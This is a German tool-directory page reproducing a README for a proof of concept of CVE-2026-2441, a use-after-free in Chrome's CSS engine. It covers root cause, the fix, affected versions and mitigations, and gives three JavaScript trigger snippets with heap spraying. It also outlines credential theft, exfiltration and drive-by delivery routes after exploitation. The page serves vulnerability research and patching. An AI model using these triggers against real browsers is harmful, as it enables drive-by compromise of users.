Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-2441-PoC — Proof-of-Concept für CVE-2026-2441, eine Chrome-CSS-Use-after-Free-Schwachstelle, die zu RCE im sandboxed Renderer führt. Enthält drei Trigger-Methoden, Heap-Grooming und eine detaillierte Analyse. | Kitploit
Tools/GitHubGitHub/d3b0j33t/cve-2026-2441-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPapers & ForschungLernen & Bildung
GitHubd3b0j33t/cve-2026-2441-poc

CVE-2026-2441-PoC

Proof-of-Concept für CVE-2026-2441, eine Chrome-CSS-Use-after-Free-Schwachstelle, die zu RCE im sandboxed Renderer führt. Enthält drei Trigger-Methoden, Heap-Grooming und eine detaillierte Analyse.

Repository anzeigen
vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-2441 — Chrome CSSFontFeatureValuesMap Use-After-Free

CVSS 8.8 (Hoch) | Aktiv in freier Wildbahn ausgenutzt | Renderer-RCE (Sandboxed)

Eine Use-After-Free-Schwachstelle in der Blink-CSS-Engine von Google Chrome, die es einem entfernten Angreifer ermöglicht, über eine präparierte HTML-Seite beliebigen Code innerhalb der Browser-Sandbox auszuführen.

Schwachstellendetails

FeldWert
CVECVE-2026-2441
CVSS8.8 (Hoch)
TypUse-After-Free (CWE-416)
KomponenteBlink CSS — CSSFontFeatureValuesMap
Quelldateithird_party/blink/renderer/core/css/css_font_feature_values_map.cc
Fix-Commit63f3cb4864c64c677cd60c76c8cb49d37d08319c
MelderShaheen Fazim (2026-02-11)
Patch-Datum2026-02-13
In freier WildbahnJa — Google bestätigte aktive Ausnutzung

Betroffene Versionen

PlattformVerwundbarBehoben
Windows / macOS (Stable)< 145.0.7632.75>= 145.0.7632.75
Linux (Stable)< 144.0.7559.75>= 144.0.7559.75
Windows / macOS (Extended Stable)< 144.0.7559.177>= 144.0.7559.177
Chromium-basierte Browser (Edge, Brave, Opera, Vivaldi)Herstellerhinweis prüfenUnterschiedlich

Grundursache

FontFeatureValuesMapIterationSource speicherte einen rohen Zeiger (const FontFeatureAliases* aliases_) auf die interne FontFeatureAliases-HashMap. Wenn die Map während der Iteration über set() oder delete() mutiert wird, führt die HashMap ein Rehashing durch — neuer Speicher wird allokiert und der alte freigegeben. Der rohe Zeiger wird zu einem hängenden Zeiger, und der nächste FetchNextItem()-Aufruf liest aus freigegebenem Speicher.

Verwundbarer Codepfad

root@kitploit:~
CreateIterationSource()
  → FontFeatureValuesMapIterationSource(map, aliases_)
  → aliases_ = roher Zeiger auf interne HashMap
  → iterator_ = aliases_->begin()

FetchNextItem()
  → liest iterator_->key  (über aliases_)

Wenn map.set() / map.delete() zwischen Iterationen aufgerufen wird:
  → HashMap führt Rehashing durch (neue Allokation, alte freigegeben)
  → aliases_ → hängender Zeiger
  → iterator_ → ungültig
  → Nächster FetchNextItem() → USE-AFTER-FREE

Fix

root@kitploit:~
- const FontFeatureAliases* aliases_;   // roher Zeiger → hängend nach Rehashing
+ const FontFeatureAliases aliases_;    // tiefe Kopie → immun gegen Rehashing

Der Fix ersetzt den rohen Zeiger durch eine tiefe Kopie der HashMap. Selbst wenn die ursprüngliche Map ein Rehashing durchführt, arbeitet der Iterator auf seiner eigenen Kopie, wodurch der hängende Zeiger verhindert wird.

Proof of Concept

Verwendung

  1. Öffnen Sie poc.html in einer verwundbaren Chrome-Version (< 145.0.7632.75)
  2. Die Seite versucht, die UAF über drei verschiedene Methoden auszulösen

Erwartete Ergebnisse

Chrome-VersionErwartetes Verhalten
< 145.0.7632.75 (ungepatcht)Renderer-Absturz — STATUS_ACCESS_VIOLATION (Windows) oder SIGSEGV (Linux/macOS). Chrome zeigt die Fehlermeldung „Can't open this page" an.
>= 145.0.7632.75 (gepatcht)Kein Absturz — PoC läuft vollständig durch, alle Einträge werden normal gelesen.

Screenshot (Ungepatchtes Chrome — Absturz)

Beim Öffnen in einer verwundbaren Chrome-Version stürzt der Renderer-Prozess mit STATUS_ACCESS_VIOLATION ab:

root@kitploit:~
Can't open this page

Error code: STATUS_ACCESS_VIOLATION

Dies bestätigt, dass die UAF ausgelöst wird — der hängende Zeiger greift auf freigegebenen/nicht zugeordneten Speicher zu, wodurch der Renderer-Prozess beendet wird.

So funktioniert der PoC

Der PoC löst die UAF über drei unabhängige Methoden aus:

Methode 1: entries()-Iterator + Mutationsschleife

root@kitploit:~
const iterator = map.entries();
while (step < 20) {
    iterator.next();          // Lesen über (inzwischen hängenden) Zeiger
    map.delete(key);          // Rehashing auslösen
    for (i = 0; i < 512; i++)
        map.set("spray_" + i, [i]);  // Reallokation erzwingen
}

Methode 2: for...of + gleichzeitige Mutation

root@kitploit:~
for (const [k, v] of map) {
    map.delete(k);
    for (i = 0; i < 512; i++)
        map.set("alt_" + i, [i]);
}

Methode 3: requestAnimationFrame + Layout-Neuberechnung

root@kitploit:~
function rafTrigger() {
    document.body.offsetWidth;   // Layout-Neuberechnung erzwingen
    const result = iterator.next();
    map.delete(k);
    for (i = 0; i < 512; i++)
        map.set("raf_" + i, [i]);
    requestAnimationFrame(rafTrigger);
}

Jede Methode enthält außerdem Heap-Grooming — die Allokation von 50 gleich großen @font-feature-values-Regeln, um das Heap-Layout für eine mögliche Ausnutzung vorhersehbar zu machen.

Auswirkungen

Unmittelbar (auf Sandbox beschränkt)

  • Beliebige Codeausführung innerhalb der Renderer-Prozess-Sandbox
  • Informationsoffenlegung — V8-Heap-Zeiger leaken (ASLR-Umgehung), Renderer-Speicherinhalte lesen
  • Credential-Diebstahl — document.cookie, localStorage, sessionStorage, Formulareingabewerte lesen
  • Session-Hijacking — Session-Tokens stehlen, über fetch() / WebSocket / sendBeacon() exfiltrieren
  • DOM-Manipulation — Phishing-Formulare einschleusen, Seiteninhalte verändern
  • Keylogging — alle Tastatureingaben über addEventListener('keydown') erfassen

Verkettet (mit Sandbox-Escape)

In Kombination mit einer separaten Sandbox-Escape-Schwachstelle:

root@kitploit:~
Renderer-RCE (CVE-2026-2441)
    → Mojo-IPC-Exploit → Browser-Prozess-RCE
        → Kernel-Exploit → Vollständige Systemkompromittierung
            → Malware / Ransomware / Spyware-Installation
            → Dateisystemzugriff, laterale Bewegung, Persistenz

Reale Exploit-Ketten mit ähnlichen Browser-UAFs:

  • NSO Pegasus — WebKit-UAF + Sandbox-Escape + Kernel-Exploit
  • Intellexa Predator — Chrome-UAF + Android-Kernel-Exploit
  • APT-28 (Fancy Bear) — Chrome-0-Day + Windows-LPE-Kette

Angriffsvektor

Diese Schwachstelle ist über Drive-by-Download ausnutzbar — keine Benutzerinteraktion über den Besuch einer bösartigen Seite hinaus erforderlich:

  • Malvertising — bösartige Anzeigen, die über legitime Werbenetzwerke ausgeliefert werden
  • Watering Hole — Kompromittierung einer vom Ziel häufig besuchten Website
  • Spear-Phishing — Versand eines präparierten Links per E-Mail oder Messenger

Gegenmaßnahmen

  1. Chrome aktualisieren auf >= 145.0.7632.75 (Windows/macOS) oder >= 144.0.7559.75 (Linux)
  2. Chromium-basierte Browser aktualisieren (Edge, Brave, Opera, Vivaldi), sobald Hersteller-Patches verfügbar sind
  3. Site Isolation überprüfen (chrome://flags/#site-isolation-trial-opt-out)
  4. Endpunkte überwachen auf Chrome-Versionen unterhalb der behobenen Builds

Zeitplan

DatumEreignis
2026-02-11Schwachstelle von Shaheen Fazim gemeldet
2026-02-13Google veröffentlicht Chrome 145.0.7632.75/76 (Windows/macOS), 144.0.7559.75 (Linux)
2026-02-13Google bestätigt Ausnutzung in freier Wildbahn
2026-02-16Vivaldi und Opera liefern Fixes aus

Referenzen

  • Google Chrome Releases Blog
  • NVD — CVE-2026-2441
  • The Hacker News — Chrome Zero-Day Under Active Attack
  • Chromium Issue Tracker (eingeschränkt)

Unterstützung

Wenn Sie diese Forschung nützlich finden, erwägen Sie, mir einen Kaffee zu spendieren:

Buy Me A Coffee

Haftungsausschluss

Dieses Proof of Concept wird ausschließlich für Bildungs- und autorisierte Sicherheitsforschungszwecke bereitgestellt. Die Verwendung dieses PoC gegen Systeme ohne ausdrückliche Genehmigung ist illegal und unethisch. Der Autor ist nicht für jeglichen Missbrauch verantwortlich.

Lizenz

MIT

Tool herunterladen